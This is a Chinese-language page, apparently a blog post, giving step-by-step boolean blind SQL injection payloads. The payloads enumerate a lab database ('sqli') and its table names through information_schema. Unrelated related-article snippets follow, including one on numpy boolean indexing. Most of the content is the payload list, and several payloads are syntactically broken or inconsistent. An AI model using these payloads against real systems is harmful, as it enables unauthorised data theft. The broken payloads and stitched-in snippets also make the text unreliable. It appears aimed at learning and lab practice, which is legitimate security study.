步驟:猜資料庫名字長度--猜資料庫名字 --猜表單數量--猜表單名字長度 --猜表單名字--猜欄位數量--猜字段長度--猜欄位
1 and length(database())>3
1 and mid(database(),1,1)='a' //用substr函式也行
1 and ascii(substr((select database()),1,1))='數字'
1 and left(database(),4)='sqli' //判斷字串
1 and 1=((select count() from information_schema.tables where table_schema='sqli')<3)
1 and length((select table_name from information_schema.tables where table_schema='sqli'),0,1)=3
1 and mid((select table_name from information_schema.tables where table_schema='sqli'),1,1)='s'
1 and left((select table_name from information_schema.tables where table_schema='sqli'),4)='sqlli'
1 and ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),1,1)='數字'
以下的操作都是同理了
SQL注入 布林注入
條件 當乙個頁面,存在注入,沒顯示位,沒有輸出sql語句執行錯誤資訊,只能通過頁面返回正常不正常進行判斷進行sql注入。例如 string sql null string a admin or 1 1 string b abc sql select from user where username ...
CTF之SQL注入
github audi 1 sqli labs sqli labs 爆庫名select database 爆表名select group concat table name from information schema.tables where table schema database 爆列名s...
numpy布林型索引
先建立乙個names一維陣列,再用numpy.random中的randn函式生成乙個7 4陣列 names np.array bob joe will bob will joe joe data np.random.randn 7,4 1.對names和字串 bob 的比較運算將會產生乙個布林型陣列...